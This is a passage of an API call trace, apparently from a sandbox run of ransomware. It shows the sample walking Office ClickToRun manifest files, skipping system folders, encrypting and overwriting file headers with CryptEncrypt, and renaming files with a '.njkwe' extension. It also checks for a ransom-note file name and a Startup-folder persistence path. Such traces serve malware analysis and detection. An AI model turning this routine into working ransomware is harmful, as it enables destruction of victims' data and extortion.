dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.242] GetTickCount () returned 0x1151eee [0070.242] GetTickCount () returned 0x1151eee [0070.242] GetTickCount () returned 0x1151eee [0070.242] GetTickCount () returned 0x1151eee [0070.242] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.242] GetProcessHeap () returned 0xbe0000 [0070.242] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0070.242] ReadFile (in: hFile=0x434, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.244] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.244] WriteFile (in: hFile=0x434, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.244] GetProcessHeap () returned 0xbe0000 [0070.244] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0070.244] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.244] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.249] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.250] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.250] CloseHandle (hObject=0x434) returned 1 [0070.250] GetProcessHeap () returned 0xbe0000 [0070.250] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.250] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 147 [0070.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.250] GetProcessHeap () returned 0xbe0000 [0070.250] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.250] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed5c4f9a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed5c4f9a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd330b2e9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8f70, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.excelmui.msi.16.en-us.xml", cAlternateFileName="C2D2CD~1.XML")) returned 1 [0070.250] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.250] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.250] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.250] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.251] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.251] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml") returned 116 [0070.251] StrStrIW (lpFirst="C2RManifest.excelmui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.251] lstrcmpW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.251] lstrcmpW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.251] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.251] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.251] GetTickCount () returned 0x1151efe [0070.251] GetTickCount () returned 0x1151efe [0070.251] GetTickCount () returned 0x1151efe [0070.251] GetTickCount () returned 0x1151efe [0070.251] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.252] GetProcessHeap () returned 0xbe0000 [0070.252] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0070.252] ReadFile (in: hFile=0x434, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.254] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.254] WriteFile (in: hFile=0x434, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.254] GetProcessHeap () returned 0xbe0000 [0070.254] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0070.254] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.254] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.255] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.255] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.255] CloseHandle (hObject=0x434) returned 1 [0070.255] GetProcessHeap () returned 0xbe0000 [0070.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.255] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 136 [0070.255] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.255] GetProcessHeap () returned 0xbe0000 [0070.255] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.255] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed59ed2c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed59ed2c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd23fe538, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8f8e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", cAlternateFileName="C233DB~1.XML")) returned 1 [0070.256] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.256] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.256] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.256] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.256] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.256] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned 129 [0070.256] StrStrIW (lpFirst="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.256] lstrcmpW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.256] lstrcmpW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.256] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.256] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.256] GetTickCount () returned 0x1151efe [0070.256] GetTickCount () returned 0x1151efe [0070.256] GetTickCount () returned 0x1151efe [0070.256] GetTickCount () returned 0x1151efe [0070.256] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.256] GetProcessHeap () returned 0xbe0000 [0070.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0070.256] ReadFile (in: hFile=0x434, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.259] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.259] WriteFile (in: hFile=0x434, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.259] GetProcessHeap () returned 0xbe0000 [0070.259] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0070.259] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.259] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.260] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.260] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.260] CloseHandle (hObject=0x434) returned 1 [0070.260] GetProcessHeap () returned 0xbe0000 [0070.260] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.260] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 149 [0070.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.260] GetProcessHeap () returned 0xbe0000 [0070.261] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.261] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed59ed2c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed59ed2c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3298bbd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x180e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.groovemui.msi.16.en-us.xml", cAlternateFileName="C26024~1.XML")) returned 1 [0070.261] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.261] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.261] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.261] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.261] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.261] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml") returned 117 [0070.261] StrStrIW (lpFirst="C2RManifest.groovemui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.261] lstrcmpW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.261] lstrcmpW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.261] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.261] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.262] GetTickCount () returned 0x1151f0d [0070.262] GetTickCount () returned 0x1151f0d [0070.262] GetTickCount () returned 0x1151f0d [0070.262] GetTickCount () returned 0x1151f0d [0070.262] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.262] GetProcessHeap () returned 0xbe0000 [0070.263] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0070.263] ReadFile (in: hFile=0x434, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380f2d4*=0x180e, lpOverlapped=0x0) returned 1 [0070.264] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffe7f2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.264] WriteFile (in: hFile=0x434, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x180e, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380f2d4*=0x180e, lpOverlapped=0x0) returned 1 [0070.265] GetProcessHeap () returned 0xbe0000 [0070.265] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0070.265] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.265] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.265] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.265] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.265] CloseHandle (hObject=0x434) returned 1 [0070.265] GetProcessHeap () returned 0xbe0000 [0070.265] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.265] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 137 [0070.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.266] GetProcessHeap () returned 0xbe0000 [0070.266] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.266] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed59ed2c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed59ed2c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd257bc65, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1979c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", cAlternateFileName="C25956~1.XML")) returned 1 [0070.266] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.266] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.266] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.266] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.266] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.266] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned 125 [0070.266] StrStrIW (lpFirst="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.266] lstrcmpW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.266] lstrcmpW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.266] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.266] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.266] GetTickCount () returned 0x1151f0d [0070.266] GetTickCount () returned 0x1151f0d [0070.266] GetTickCount () returned 0x1151f0d [0070.266] GetTickCount () returned 0x1151f0d [0070.266] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.267] GetProcessHeap () returned 0xbe0000 [0070.267] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0070.267] ReadFile (in: hFile=0x434, 